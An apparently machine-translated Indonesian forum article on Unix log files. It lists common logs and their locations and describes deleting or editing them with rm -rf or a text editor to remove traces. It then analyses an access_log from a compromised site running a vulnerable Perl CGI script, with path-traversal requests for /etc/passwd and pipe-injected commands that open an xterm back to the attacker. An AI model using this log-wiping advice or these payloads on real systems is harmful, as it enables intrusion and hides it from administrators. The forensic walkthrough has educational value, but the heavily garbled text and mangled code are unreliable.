Hehehehe, .. I, this rich title lagunya yach what band? 
Upst,. Loh but related track problems over hacking on the same machine * nix, noo .. noo .. noo .. same song hacking, where interest rates related?

Okey deyh, rather than flowers spelled shirt size L Lebai alias, directly in the segment ajah deyh little thrifty.

. log file? is a file that contains notes about anything done by anyone in a machine. To access this you need is you, as root / SU. This file can be opened or edited with a text editor and using hexa editor according to the type / kind-macamnya. Loh kok macamnya? Emangnya are the types of log files that do?

This macem what type of log file from it, but I have the error and apologize in the correction yach temen-temen, interest rates are still learning

1. . history: a record of all things done by the user, usually stored in the user directory. It's easy to delete what the edit, as long as our SU status.
2. acct ato PACT: record all things done by the user, but does not record a program run by the user, this is only a daily record engine, so the file size can grow much every day. Usually located in / var / adm / savacct.
3. access_log: notes on the www file access, such as: the hostname, remote login, and access the commands in the http, is used in the NCSA httpd server. Usually the form of ordinary text, it is very easy to edit using a text editor only.
4. aculog: record the modem.
5. lastlog: record of user logins, both incoming voice failed login. Didalemnya recorded user's IP address tersebut.sangat easily removed, a coomannd ajah lsg erased kok.
6. loginlog: record only the user fails to login 5 times usually after a failed experiment recorded a new login. Forms only text files can be very easily removed ato edited.
7. messages: record any results issued by the syslog. Forms only text files can be very easily removed ato edited.
8. sulog: any record made by su. Forms only text files can be very easily removed ato edited.
9. utmp: record who are going to be logged in a machine. Usually use the command to find out who it is in cool-asikan in the engine. This file berekstensi utmpx.
10. wtmp: mencatet user login using ftp, berekstensi wtmpx, and use hexaeditor to edit it.
11. vold.log: record the error on the machines that use external media, eg cd room, floppy, etc..
12. xferlog: ftp usage records (almost the same spt wmtp).
13. syslog:

Once we know little about the kinds of macamnya ago-we will try to browse more. Terangkum over all the files in a file called syslog. Syslog daemon has a useful as the "heart" called syslogd. While syslog is running toward him akan conf file located in / etc / syslog.conf to read the report from the three issued by:
a. / dev / klog (to read kernel report)
b. / dev / log (read the report program that runs on the local machine)
c. UDP port 514 (the report program that runs on the network)
So we already know a bit about this log file, but ... .. where is the file? For one thing this place abstract-alias can be moved to change, the admin topcer usually hide in this file brangkasnya, .. .. I may hehehehehhe it  flowers, so I may be in brangkas siy, but the diumpetin serapat-rapatnya serahasia only admin and God who know . Sad but do not advance, according to the experience of flowers, the admin There are many more careless with the assumption diparkirkan still on the default, "because the default is not secure" hacker NTU English words, but the flowers sure Nicknya .
Place the log files from the Flowers:
• / usr / adm
• / var / adm
• / var / log
Once again this is absolutely noo,. If want to clear, only adminnya come passnya Ask, Ask lognya file, continue to ask for permission to use it all over, what is this 100% halal. Hehehehehehe. Becanda

Dah met file lognya way up, but how yach? Masnya take a wet cloth towel ajah monitornya ago, whom I can clean. Hehehehehehe. Becanda ding again 
Do a rm-rf command, syntak: command [patch], example: rm-rf / var / log / wmtp, what also use a text editor sepert vi / nano / pico, simply delete the data only, more or less the same as dual konfigurai lilo boot

Help, we now continue longer, but the tired yach dah,. Make tea, coffee, or susu cemilannya help do not forget, let my spirit,. .. GO GO .. GO ..

Okey now we try to dissect the log files to find out vulnerbilty on our machine. Before, once again if there is a pardon Flowers error, mas, om, MBA, auntie, sister, and a more senior candidate Flower ask permission. "One of science teachers each other as possible prohibited ". hehehehehehehe, ...

Here is an example in the case http://www.c **. co.id, flowers never do forensic on the server machine, use the web programernya Perl CGI scripts, server diobrak upset by craker mad, but he is rather haphazard where he does not remove access_log on its track, (for its IP disamarkan):

10.0 .*.** - - [24/Oct/2008: 01:02:45 +0530] "GET / HTTP/1.0" 200 3008
10.0 .*.** - - [24/Oct/2008: 01:02:45 +0530] "GET / A1.jpg HTTP/1.0" 200 3456
10.0 .*.** - - [24/Oct/2008: 01:02:45 +0530] "GET / V90.jpg HTTP/1.0" 200 6943
10.0 .*.** - - [24/Oct/2008: 01:02:45 +0530] "GET / RG7.jpg HTTP/1.0" 200 9854

Description: Attacker with no Ip 10.0 .*.**, he only see this web page on the main event and this dicatet at 01:02:45.

10.0 .*.** - - [24/Oct/2008: 01:02:45 +0530] "GET / index.cgi? Contact.shtml page = HTTP/1.0" 200 309
10.0 .*.** - - [24/Oct/2008: 01:02:45 +0530] "GET / NOW.jpg HTTP/1.0" 200 3456
10.0 .*.** - - [24/Oct/2008: 01:02:45 +0530] "GET / index.cgi? Layanan.shtml page = HTTP/1.0" 200 309
10.0 .*.** - - [24/Oct/2008: 01:02:45 +0530] "GET / 9RG7.jpg HTTP/1.0" 200 9854

Description: The attacker is difficult what he dikarena still to see and try this link on the web.

10.0 .*.** - - [24/Oct/2008: 01:02:45 +0530] "GET / cgi-bin / HTTP/1.0" 403 272

Description: Attacker start off, he tried to access direktory / cgi-bin / and the result is the finding that 403, 403 means what siy? forbiden cuy,. 

10.0 .*.** - - [24/Oct/2008: 01:02:45 +0530] "GET / index.cgi HTTP/1.0" 200 3009
10.0 .*.** - - [24/Oct/2008: 01:02:45 +0530] "GET / index.cgi? Page = index.cgi HTTP/1.0" 200 399

Description: Attacker continue serangannya again, now he is following the pattern that has been lihatnya link. Peratama he entered http://www.c **. co.id / index.cgi ago he tried again mamasukan http://www.c **. co.id / index.cgi? Page = index.cgi.
Now from here the attacker can see the script index.cgi it, view it from where? Help from browsernya lah,. Scriptnya appear in the browser .
How can this happen?
Attacker examine an index.cgi file name as parameter seuatu and show the contents of the file. Here the attacker uses index.cgi itself to display the source code.

Source code:

01: #! / usr / bin / perl
02: # perl script to display a page back as requested by the arguments
03:
04: require ".. / cgi-bin / cgi-lib.pl";
05:
06: & ReadParse (* input);
07:
08: $ filename = $ input (page);
09: if ($ filename eq "") (
10: $ filename = "main.html";
11:)
12:
13: print & PrintHeader;
14:
15: $ filename = "/ usr / local / apache / htdocs /". $ filename;
16: open (FILE, $ filename);
17: while () (
18: print $ _;
19:)
20: close (file);

Now we cover and learned,. Blankota it to be on the validation parameters will be missed to the index.cgi script. Skipping a filename as a parameter from the url arrested as a variable $ filename on line 08, added to the absolute path "usr / local / apache / htdocs" in line 15, and displayed on line 16.
Means, yups ... right. We can easily retrieve the file from the web server 

10.0 .*.** - - [24/Oct/2008: 01:02:45 +0530] "GET / index.cgi? =/../../../../../.. Page /../../../ etc / passwd HTTP/1.0 "200 786

Description: Now try to find the attacker password,. ... Wow

10.0 .*.** - - [24/Oct/2008: 01:02:45 +0530] "GET / index.cgi? Page = | + ls-la + /%% 0aid xterm + 0awhich | HTTP/1.0" 200 1399

10.0 .*.** - - [24/Oct/2008: 01:02:45 +0530] "GET / index.cgi? Page = | xterm display +10.0 .*.**: + 0.0% + 26 | HTTP / 1.0 "200

Description: The attacker understand this about unix and perl, now he does not attempt to open the file because he was now using the pipe character "|" followed by the command-option command. Thus, the ribbons to open the perl file which can receive the standard output of command from the command-written in the filename parameter. Here the attacker asks for 2 pieces request:
http://www.c **. co.id / index.cgi? page = | ls ... ich + xterm |
here clearly how attacker execute coomand ls-la /, id, which xterm. didapet of what the attacker is executing coomand?
Didapet that is: showing a list of files in the root direktory with the command ls-la /, get the effective user id on execution index.cgi process with the command id, and the path terkahir get xtrem binary from the command "which xterm".
The second request:
http://www.c **. co.id / index.cgi? page = | XT ... *: + 0.0% 26 |
attacker to run command "xterm - display 0.0 & 10.0 .*.**:" this means he is running xterm window on the attacker machine. Then what to do? Yach udah go user, pass trus, go deyh,. .
From here we currently know bugs in the machine we see the logs left by the attacker.
Yach,. Segitu ajah of interest on the open and remove the trace log file-opener tuk dapet vulnerbilty an engine.
Hopefully ajah this article useful to IT security progress Indonesia.Mohon be the more senior people what a champion in this field, as the flowers are still learning.
Makacih for all those who have what the world and what in all forums,.

Warmest regards